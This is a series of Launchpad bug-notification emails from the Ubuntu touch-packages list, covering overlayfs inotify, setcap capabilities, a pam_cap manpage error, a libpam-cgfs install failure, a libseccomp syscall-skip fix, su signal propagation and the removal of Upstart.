Nope, tail -f is still broken at least in 4.12. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to coreutils in Ubuntu. https://bugs.launchpad.net/bugs/882147 Title: overlayfs does not implement inotify interfaces correctly Status in coreutils package in Ubuntu: In Progress Status in linux package in Ubuntu: Triaged Status in coreutils source package in Precise: Confirmed Status in linux source package in Precise: Triaged Bug description: When using tail on the liveCD some updates are not reported. This seems to be triggered by tail using inotify to identify modified files. Overlayfs does not appear to be implementing inotify quite the way you might hope reporting only against the underlying filesystems. Related bugs: * bug 1213925: upstart should notice "/etc" inode change ProblemType: Bug DistroRelease: Ubuntu 11.10 Package: linux-image-3.0.0-12-generic 3.0.0-12.20 ProcVersionSignature: Ubuntu 3.0.0-12.20-generic 3.0.4 Uname: Linux 3.0.0-12-generic x86_64 AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24. ApportVersion: 1.23-0ubuntu3 Architecture: amd64 ArecordDevices: List of CAPTURE Hardware Devices card 0: Intel [HDA Intel], device 0: STAC92xx Analog [STAC92xx Analog] Subdevices: 0/1 Subdevice #0: subdevice #0 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: apw2296 F pulseaudio /dev/snd/pcmC0D0c: apw2296 F...m pulseaudio /dev/snd/pcmC0D0p: apw2296 F...m pulseaudio Card0.Amixer.info: Card hw:0 'Intel'/'HDA Intel at 0xfc70 irq 47' Mixer name : 'Intel Cantiga HDMI' Components : 'HDA:111d7675,1028029f,00100103 HDA:80862802,80860101,0010' Controls : 20 Simple ctrls : 11 Date: Wed Oct 26 17:46:16 2011 EcryptfsInUse: Yes HibernationDevice: RESUME=UUID=d8328455-deac-4bae-877d-c408d371cefe MachineType: Dell Inc. Studio 1537 ProcEnviron: PATH=(custom, user) LANG=en_GB.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.0.0-12-generic root=UUID=cf503727-25f2-4ecd-b0f3-2b894523bcba ro quiet splash vt.handoff=7 RelatedPackageVersions: linux-restricted-modules-3.0.0-12-generic N/A linux-backports-modules-3.0.0-12-generic N/A linux-firmware1.60 SourcePackage: linux UpgradeStatus: Upgraded to oneiric on 2011-10-17 (9 days ago) WpaSupplicantLog: dmi.bios.date: 09/22/2008 dmi.bios.vendor: Dell Inc. dmi.bios.version: A03 dmi.board.vendor: Dell Inc. dmi.board.version: A03 dmi.chassis.type: 8 dmi.chassis.vendor: Dell Inc. dmi.chassis.version: A03 dmi.modalias: dmi:bvnDellInc.:bvrA03:bd09/22/2008:svnDellInc.:pnStudio1537:pvrA03:rvnDellInc.:rn:rvrA03:cvnDellInc.:ct8:cvrA03: dmi.product.name: Studio 1537 dmi.product.version: A03 dmi.sys.vendor: Dell Inc. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/882147/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 882147] Re: overlayfs does not implement inotify interfaces correctly
I've seen reports that this is fixed in 4.10? -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to coreutils in Ubuntu. https://bugs.launchpad.net/bugs/882147 Title: overlayfs does not implement inotify interfaces correctly Status in coreutils package in Ubuntu: In Progress Status in linux package in Ubuntu: Triaged Status in coreutils source package in Precise: Confirmed Status in linux source package in Precise: Triaged Bug description: When using tail on the liveCD some updates are not reported. This seems to be triggered by tail using inotify to identify modified files. Overlayfs does not appear to be implementing inotify quite the way you might hope reporting only against the underlying filesystems. Related bugs: * bug 1213925: upstart should notice "/etc" inode change ProblemType: Bug DistroRelease: Ubuntu 11.10 Package: linux-image-3.0.0-12-generic 3.0.0-12.20 ProcVersionSignature: Ubuntu 3.0.0-12.20-generic 3.0.4 Uname: Linux 3.0.0-12-generic x86_64 AlsaVersion: Advanced Linux Sound Architecture Driver Version 1.0.24. ApportVersion: 1.23-0ubuntu3 Architecture: amd64 ArecordDevices: List of CAPTURE Hardware Devices card 0: Intel [HDA Intel], device 0: STAC92xx Analog [STAC92xx Analog] Subdevices: 0/1 Subdevice #0: subdevice #0 AudioDevicesInUse: USERPID ACCESS COMMAND /dev/snd/controlC0: apw2296 F pulseaudio /dev/snd/pcmC0D0c: apw2296 F...m pulseaudio /dev/snd/pcmC0D0p: apw2296 F...m pulseaudio Card0.Amixer.info: Card hw:0 'Intel'/'HDA Intel at 0xfc70 irq 47' Mixer name : 'Intel Cantiga HDMI' Components : 'HDA:111d7675,1028029f,00100103 HDA:80862802,80860101,0010' Controls : 20 Simple ctrls : 11 Date: Wed Oct 26 17:46:16 2011 EcryptfsInUse: Yes HibernationDevice: RESUME=UUID=d8328455-deac-4bae-877d-c408d371cefe MachineType: Dell Inc. Studio 1537 ProcEnviron: PATH=(custom, user) LANG=en_GB.UTF-8 SHELL=/bin/bash ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.0.0-12-generic root=UUID=cf503727-25f2-4ecd-b0f3-2b894523bcba ro quiet splash vt.handoff=7 RelatedPackageVersions: linux-restricted-modules-3.0.0-12-generic N/A linux-backports-modules-3.0.0-12-generic N/A linux-firmware1.60 SourcePackage: linux UpgradeStatus: Upgraded to oneiric on 2011-10-17 (9 days ago) WpaSupplicantLog: dmi.bios.date: 09/22/2008 dmi.bios.vendor: Dell Inc. dmi.bios.version: A03 dmi.board.vendor: Dell Inc. dmi.board.version: A03 dmi.chassis.type: 8 dmi.chassis.vendor: Dell Inc. dmi.chassis.version: A03 dmi.modalias: dmi:bvnDellInc.:bvrA03:bd09/22/2008:svnDellInc.:pnStudio1537:pvrA03:rvnDellInc.:rn:rvrA03:cvnDellInc.:ct8:cvrA03: dmi.product.name: Studio 1537 dmi.product.version: A03 dmi.sys.vendor: Dell Inc. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/coreutils/+bug/882147/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1700814] Re: Default capability of cap_setfcap+i should be set on setcap
Indeed it should be reasonable to do so. Note that there are cases, including unprivileged containers, where file capabilities cannot be set, so the packaging would have to gracefully handle (i.e. ignore) that failure rather than fail the package install. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700814 Title: Default capability of cap_setfcap+i should be set on setcap Status in libcap2 package in Ubuntu: New Bug description: If I grant a user (via pam_cap) cap_setfcap+i, I would then expect them to be able to use setcap without sudo. setcap is not provided with any default file capabilities however, so either the user has to sudo, or I have to grant the setfcap capability to setcap with setcap. In my mind, it would be reasonable to grant setfcap+i to setcap by default on installation. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700814/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1700812] Re: pam_cap is provided by the libpam-cap package on x86_64 xenial
@mattofak - thanks for filing the bug. I've linked it to the manpage project. It'll get fixed. ** Also affects: ubuntu-manpage-repository Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700812 Title: pam_cap is provided by the libpam-cap package on x86_64 xenial Status in Ubuntu Manpage Repository: New Status in libcap2 package in Ubuntu: New Bug description: The man page for pam_cap (http://manpages.ubuntu.com/manpages/xenial/man8/pam_cap.8.html) claims that it is provided by the libcap2-bin package. This is incorrect, it is actually provided by the libpam-cap package (which is recommended by libcap2-bin.) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu-manpage-repository/+bug/1700812/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1700812] [NEW] pam_cap is provided by the libpam-cap package on x86_64 xenial
Note, the actual manpage makes no mention of the package. Which is how it should be, as the manpage comes from upstream and not from Ubuntu. So if this is a bug, it is a bug against manpages.ubuntu.com. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libcap2 in Ubuntu. https://bugs.launchpad.net/bugs/1700812 Title: pam_cap is provided by the libpam-cap package on x86_64 xenial Status in libcap2 package in Ubuntu: New Bug description: The man page for pam_cap (http://manpages.ubuntu.com/manpages/xenial/man8/pam_cap.8.html) claims that it is provided by the libcap2-bin package. This is incorrect, it is actually provided by the libpam-cap package (which is recommended by libcap2-bin.) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libcap2/+bug/1700812/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1696989] Re: package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 128
Hi, thanks for taking the time to report this bug. This actually appears to be a problem not in libpam-cgfs itself: Setting up libpam-cgfs (2.0.7-0ubuntu1~17.04.1) ... Use of uninitialized value $reply in scalar chomp at /usr/share/perl5/Debconf/FrontEnd/Passthrough.pm line 66. I'm going to mark this as affecting debconf, though the error message looks like a duplicate of a supposedly resolved bug. Can you please show the result of dpkg -l | grep debconf cat /etc/*-release so we can check the versions? ** Also affects: debconf (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to debconf in Ubuntu. https://bugs.launchpad.net/bugs/1696989 Title: package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 128 Status in debconf package in Ubuntu: New Status in lxcfs package in Ubuntu: New Bug description: Error occurred while updating from terminal: W: APT had planned for dpkg to do more than it reported back (40 vs 44). Affected packages: libpam-cgfs:amd64 ProblemType: Package DistroRelease: Ubuntu 17.04 Package: libpam-cgfs 2.0.7-0ubuntu1~17.04.1 ProcVersionSignature: Ubuntu 4.10.0-22.24-generic 4.10.15 Uname: Linux 4.10.0-22-generic x86_64 ApportVersion: 2.20.4-0ubuntu4.1 Architecture: amd64 Date: Fri Jun 9 14:49:06 2017 ErrorMessage: subprocess installed post-installation script returned error exit status 128 InstallationDate: Installed on 2017-03-16 (84 days ago) InstallationMedia: Ubuntu 16.10 "Yakkety Yak" - Release amd64 (20161012.2) RelatedPackageVersions: dpkg 1.18.10ubuntu2 apt 1.4 SourcePackage: lxcfs Title: package libpam-cgfs 2.0.7-0ubuntu1~17.04.1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 128 UpgradeStatus: Upgraded to zesty on 2017-04-18 (52 days ago) To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/debconf/+bug/1696989/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1695808] Re: tasks killed for nop (-1)
Note, I'm happy to update a fix for this for a (and a -proposed one for xenial). -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu. https://bugs.launchpad.net/bugs/1695808 Title: tasks killed for nop (-1) Status in libseccomp package in Ubuntu: Confirmed Bug description: As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a tracer can set nr to -1 to skip the syscall. Similarly, one task could be debugging another seccomp'd task, simply doing PTRACE_SYSCALL without using SECCOMP_PTRACE, and want to make the tracee skip a syscall by setting nr to -1. However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches nr == -1. This kills any application using -1 to skip a syscall. This means that any such application running under lxd, which uses libseccomp to set its seccomp policies, fails. libseccomp upstream has been fixed, see https://github.com/seccomp/libseccomp/issues/80 . Ideally this fix would be cherrypicked into both artful and xenial. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1695808/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1695808] [NEW] tasks killed for nop (-1)
Public bug reported: As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a tracer can set nr to -1 to skip the syscall. Similarly, one task could be debugging another seccomp'd task, simply doing PTRACE_SYSCALL without using SECCOMP_PTRACE, and want to make the tracee skip a syscall by setting nr to -1. However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches nr == -1. This kills any application using -1 to skip a syscall. This means that any such application running under lxd, which uses libseccomp to set its seccomp policies, fails. libseccomp upstream has been fixed, see https://github.com/seccomp/libseccomp/issues/80 . Ideally this fix would be cherrypicked into both artful and xenial. ** Affects: libseccomp (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to libseccomp in Ubuntu. https://bugs.launchpad.net/bugs/1695808 Title: tasks killed for nop (-1) Status in libseccomp package in Ubuntu: New Bug description: As the seccomp manpage points out, after seeing a SECCOMP_RET_TRACE, a tracer can set nr to -1 to skip the syscall. Similarly, one task could be debugging another seccomp'd task, simply doing PTRACE_SYSCALL without using SECCOMP_PTRACE, and want to make the tracee skip a syscall by setting nr to -1. However, the way libseccomp checks for X86_SYSCALL_BIT wrongly catches nr == -1. This kills any application using -1 to skip a syscall. This means that any such application running under lxd, which uses libseccomp to set its seccomp policies, fails. libseccomp upstream has been fixed, see https://github.com/seccomp/libseccomp/issues/80 . Ideally this fix would be cherrypicked into both artful and xenial. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/libseccomp/+bug/1695808/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1690820] Re: killing su does not kill subprocess (SIGTERM not propagated)
Thanks for filing, Radu. The commit which fixed it is in this PR: https://github.com/shadow-maint/shadow/pull/72 (wget https://github.com/shadow-maint/shadow/pull/72.patch) -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to shadow in Ubuntu. https://bugs.launchpad.net/bugs/1690820 Title: killing su does not kill subprocess (SIGTERM not propagated) Status in shadow package in Ubuntu: New Bug description: Problem first appeared in login_4.1.5.1-1ubuntu9.4 and version login_4.1.5.1-1ubuntu9.2 was not affected. Example where the subprocess 115576 has not been terminated: root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pkill sleep; ./su test -c 'sleep '& [1] 115575 root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# kill $! root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# ...waiting for child to terminate. pgrep sleep 115576 [1]+ Exit 255./su test -c 'sleep ' root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pgrep sleep 115576 Expected behavior: root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pkill sleep; ./su test -c 'sleep ' & [1] 115503 root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# kill $! root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# Session terminated, terminating shell... ...terminated. ...terminated. [1]+ Exit 143./su test -c 'sleep ' root@ubuntu:~/sudebug/src/shadow-4.1.5.1/src# pgrep sleep To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1690820/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd
@bryanquigley - no. i had opened one for networkmanager (or planned on it, don't remember how far i got), but in the end to provide meaningful details i'd have to *run* it. Stop trying to get me to run it. Thanks. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-touch-meta in Ubuntu. https://bugs.launchpad.net/bugs/1649310 Title: RM Upstart, obsolete, superseded by systemd Status in cgmanager package in Ubuntu: Triaged Status in lxc-android-config package in Ubuntu: Triaged Status in ubuntu-touch-meta package in Ubuntu: Triaged Status in ubuntu-touch-session package in Ubuntu: Triaged Status in unity8-desktop-session package in Ubuntu: Triaged Status in upstart package in Ubuntu: Triaged Status in upstart-watchdog package in Ubuntu: Triaged Bug description: In 18.04 LTS src:upstart should not be part of Ubuntu. It has already been removed from Debian. And most products have migrated to systemd. This is a tracking bug to remove a collection of packages that need to go away together with upstart. Some of these have been ported to systemd under different names, or no longer at all required. = Removal order = * ubuntu-touch-meta * unity8-desktop-session * ubuntu-touch-session * upstart-watchdog * lxc-android-config * upstart * cgmanager = Reverse depends checks = $ reverse-depends -b src:upstart Reverse-Build-Depends = * tarantool (for upstart) ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart (<< 1.13), * unity (for libupstart-dev) https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283 https://bileto.ubuntu.com/#/ticket/2730 $ reverse-depends src:upstart Reverse-Depends === * ubuntu-touch-session (for upstart) * unity8-desktop-session(for upstart) * upstart-watchdog (for upstart) $ reverse-depends src:ubuntu-touch-session Reverse-Depends === * ubuntu-touch (for ubuntu-touch-session) $ reverse-depends -b src:ubuntu-touch-session No reverse dependencies found $ reverse-depends upstart-watchdog Reverse-Depends === * ubuntu-touch $ reverse-depends -b src:upstart-watchdog No reverse dependencies found $ reverse-depends src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends -b src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends src:unity8-desktop-session No reverse dependencies found $ reverse-depends -b src:unity8-desktop-session No reverse dependencies found $ reverse-depends src:cgmanager Reverse-Depends === * lxc-android-config(for cgmanager) * numad (for cgmanager) ./debian/control:Depends: systemd-sysv | cgmanager * upstart [amd64 arm64 armhf i386 ppc64el] (for libcgmanager0) $ reverse-depends -b src:cgmanager Reverse-Build-Depends = * upstart (for libcgmanager-dev) $ reverse-depends src:lxc-android-config Reverse-Depends === * ubuntu-touch (for lxc-android-config) $ reverse-depends -b src:lxc-android-config No reverse dependencies found To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd
@bryanquigley that's an odd non-sequitur. I'm avoiding switching to systemd (in part for power usage), and cgroupfs-mount is not the thing being removed. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-touch-meta in Ubuntu. https://bugs.launchpad.net/bugs/1649310 Title: RM Upstart, obsolete, superseded by systemd Status in cgmanager package in Ubuntu: Triaged Status in lxc-android-config package in Ubuntu: Triaged Status in ubuntu-touch-meta package in Ubuntu: Triaged Status in ubuntu-touch-session package in Ubuntu: Triaged Status in unity8-desktop-session package in Ubuntu: Triaged Status in upstart package in Ubuntu: Triaged Status in upstart-watchdog package in Ubuntu: Triaged Bug description: In 18.04 LTS src:upstart should not be part of Ubuntu. It has already been removed from Debian. And most products have migrated to systemd. This is a tracking bug to remove a collection of packages that need to go away together with upstart. Some of these have been ported to systemd under different names, or no longer at all required. = Removal order = * ubuntu-touch-meta * unity8-desktop-session * ubuntu-touch-session * upstart-watchdog * lxc-android-config * upstart * cgmanager = Reverse depends checks = $ reverse-depends -b src:upstart Reverse-Build-Depends = * tarantool (for upstart) ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart (<< 1.13), * unity (for libupstart-dev) https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283 https://bileto.ubuntu.com/#/ticket/2730 $ reverse-depends src:upstart Reverse-Depends === * ubuntu-touch-session (for upstart) * unity8-desktop-session(for upstart) * upstart-watchdog (for upstart) $ reverse-depends src:ubuntu-touch-session Reverse-Depends === * ubuntu-touch (for ubuntu-touch-session) $ reverse-depends -b src:ubuntu-touch-session No reverse dependencies found $ reverse-depends upstart-watchdog Reverse-Depends === * ubuntu-touch $ reverse-depends -b src:upstart-watchdog No reverse dependencies found $ reverse-depends src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends -b src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends src:unity8-desktop-session No reverse dependencies found $ reverse-depends -b src:unity8-desktop-session No reverse dependencies found $ reverse-depends src:cgmanager Reverse-Depends === * lxc-android-config(for cgmanager) * numad (for cgmanager) ./debian/control:Depends: systemd-sysv | cgmanager * upstart [amd64 arm64 armhf i386 ppc64el] (for libcgmanager0) $ reverse-depends -b src:cgmanager Reverse-Build-Depends = * upstart (for libcgmanager-dev) $ reverse-depends src:lxc-android-config Reverse-Depends === * ubuntu-touch (for lxc-android-config) $ reverse-depends -b src:lxc-android-config No reverse dependencies found To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
[Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseded by systemd
I don't expect upstart to be supported, but it would be nice to keep it in universe. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-touch-meta in Ubuntu. https://bugs.launchpad.net/bugs/1649310 Title: RM Upstart, obsolete, superseded by systemd Status in cgmanager package in Ubuntu: New Status in lxc-android-config package in Ubuntu: New Status in ubuntu-touch-meta package in Ubuntu: In Progress Status in ubuntu-touch-session package in Ubuntu: Triaged Status in unity8-desktop-session package in Ubuntu: In Progress Status in upstart package in Ubuntu: Triaged Status in upstart-watchdog package in Ubuntu: Triaged Bug description: In 18.04 LTS src:upstart should not be part of Ubuntu. It has already been removed from Debian. And most products have migrated to systemd. This is a tracking bug to remove a collection of packages that need to go away together with upstart. Some of these have been ported to systemd under different names, or no longer at all required. = Removal order = * ubuntu-touch-meta * unity8-desktop-session * ubuntu-touch-session * upstart-watchdog * lxc-android-config * upstart * cgmanager = Reverse depends checks = $ reverse-depends -b src:upstart Reverse-Build-Depends = * autopilot (for upstart) https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3 * tarantool (for upstart) ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart (<< 1.13), * ubuntuone-credentials (for upstart) https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1 * unity (for libupstart-dev) https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283 https://bileto.ubuntu.com/#/ticket/2730 $ reverse-depends src:upstart Reverse-Depends === * ubuntu-touch-session (for upstart) * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el] (for upstart) https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1 * unity8-desktop-session(for upstart) * upstart-watchdog (for upstart) $ reverse-depends src:ubuntu-touch-session Reverse-Depends === * ubuntu-touch (for ubuntu-touch-session) $ reverse-depends -b src:ubuntu-touch-session No reverse dependencies found $ reverse-depends upstart-watchdog Reverse-Depends === * ubuntu-touch $ reverse-depends -b src:upstart-watchdog No reverse dependencies found $ reverse-depends src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends -b src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends src:unity8-desktop-session No reverse dependencies found $ reverse-depends -b src:unity8-desktop-session No reverse dependencies found $ reverse-depends src:cgmanager Reverse-Depends === * lxc-android-config(for cgmanager) * numad (for cgmanager) ./debian/control:Depends: systemd-sysv | cgmanager * ubuntu-core-libs (for libcgmanager0) https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17 * upstart [amd64 arm64 armhf i386 ppc64el] (for libcgmanager0) $ reverse-depends -b src:cgmanager Reverse-Build-Depends = * qtmir (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3 * qtmir-gles(for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3 * ubuntu-app-launch (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3 * upstart (for libcgmanager-dev) $ reverse-depends src:lxc-android-config Reverse-Depends === * ubuntu-touch (for lxc-android-config) $ reverse-depends -b src:lxc-android-config No reverse dependencies found To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseeded by systemd
I'm concerned about upstart in particular. Indeed cgmanager is unsupported. I'm using upstart with cgroupfs-mount. -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to ubuntu-touch-meta in Ubuntu. https://bugs.launchpad.net/bugs/1649310 Title: RM Upstart, obsolete, superseeded by systemd Status in cgmanager package in Ubuntu: New Status in lxc-android-config package in Ubuntu: New Status in ubuntu-touch-meta package in Ubuntu: In Progress Status in ubuntu-touch-session package in Ubuntu: Triaged Status in unity8-desktop-session package in Ubuntu: In Progress Status in upstart package in Ubuntu: Triaged Status in upstart-watchdog package in Ubuntu: Triaged Bug description: In 18.04 LTS src:upstart should not be part of Ubuntu. It has already been removed from Debian. And most products have migrated to systemd. This is a tracking bug to remove a collection of packages that need to go away together with upstart. Some of these have been ported to systemd under different names, or no longer at all required. = Removal order = * ubuntu-touch-meta * unity8-desktop-session * ubuntu-touch-session * upstart-watchdog * lxc-android-config * upstart * cgmanager = Reverse depends checks = $ reverse-depends -b src:upstart Reverse-Build-Depends = * autopilot (for upstart) https://launchpad.net/ubuntu/+source/autopilot/1.6.0+17.04.20170313-0ubuntu3 * tarantool (for upstart) ./debian/control: dh-systemd (>= 1.22) | sysvinit (<< 2.88dsf-59) | upstart (<< 1.13), * ubuntuone-credentials (for upstart) https://launchpad.net/ubuntu/+source/ubuntuone-credentials/15.11+17.04.20161107ubuntu1 * unity (for libupstart-dev) https://code.launchpad.net/~xnox/unity/no-more-upstart-dep/+merge/322283 https://bileto.ubuntu.com/#/ticket/2730 $ reverse-depends src:upstart Reverse-Depends === * ubuntu-touch-session (for upstart) * ubuntu-ui-toolkit-autopilot [amd64 arm64 armhf i386 ppc64el] (for upstart) https://launchpad.net/ubuntu/+source/ubuntu-ui-toolkit/1.3.2190+17.04.20170327ubuntu1 * unity8-desktop-session(for upstart) * upstart-watchdog (for upstart) $ reverse-depends src:ubuntu-touch-session Reverse-Depends === * ubuntu-touch (for ubuntu-touch-session) $ reverse-depends -b src:ubuntu-touch-session No reverse dependencies found $ reverse-depends upstart-watchdog Reverse-Depends === * ubuntu-touch $ reverse-depends -b src:upstart-watchdog No reverse dependencies found $ reverse-depends src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends -b src:ubuntu-touch-meta No reverse dependencies found $ reverse-depends src:unity8-desktop-session No reverse dependencies found $ reverse-depends -b src:unity8-desktop-session No reverse dependencies found $ reverse-depends src:cgmanager Reverse-Depends === * lxc-android-config(for cgmanager) * numad (for cgmanager) ./debian/control:Depends: systemd-sysv | cgmanager * ubuntu-core-libs (for libcgmanager0) https://launchpad.net/ubuntu/+source/ubuntu-core-meta/0.6.17 * upstart [amd64 arm64 armhf i386 ppc64el] (for libcgmanager0) $ reverse-depends -b src:cgmanager Reverse-Build-Depends = * qtmir (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir/0.5.1+17.04.20170404-0ubuntu3 * qtmir-gles(for libcgmanager-dev) https://launchpad.net/ubuntu/+source/qtmir-gles/0.5.1+17.04.20170404-0ubuntu3 * ubuntu-app-launch (for libcgmanager-dev) https://launchpad.net/ubuntu/+source/ubuntu-app-launch/0.12+17.04.20170404.2-0ubuntu3 * upstart (for libcgmanager-dev) $ reverse-depends src:lxc-android-config Reverse-Depends === * ubuntu-touch (for lxc-android-config) $ reverse-depends -b src:lxc-android-config No reverse dependencies found To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/cgmanager/+bug/1649310/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
Re: [Touch-packages] [Bug 1649310] Re: RM Upstart, obsolete, superseeded by systemd
